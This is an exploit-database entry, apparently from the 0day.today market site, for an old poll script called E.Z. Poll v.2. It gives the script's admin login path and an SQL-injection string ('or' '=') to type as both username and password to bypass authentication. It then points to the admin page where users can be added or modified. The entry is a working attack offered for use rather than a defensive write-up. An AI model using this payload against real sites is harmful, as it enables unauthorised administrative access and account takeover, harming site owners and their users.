[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

E.Z. Poll v.2 (Auth Bypass) Remote SQL Injection Vulnerability

Author
t0fx
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4329
Category
web applications
Date add
01-12-2008
Platform
unsorted
==============================================================
E.Z. Poll v.2 (Auth Bypass) Remote SQL Injection Vulnerability
==============================================================


Description:
************* ***************** ************* *******************
E.Z. Poll <= v.2 script Remote SQL injection Exploit
discovered by t0fx aka xtof69
vendor : E.Z.


************* ***************** ************* *******************

vulnerable page : http://www.site.com/admin/login.asp

exploit :

Username : 'or' '='
Password : 'or' '='

Add, modify user :
/admin/admin-users.asp 



#  0day.today [2024-12-25]  #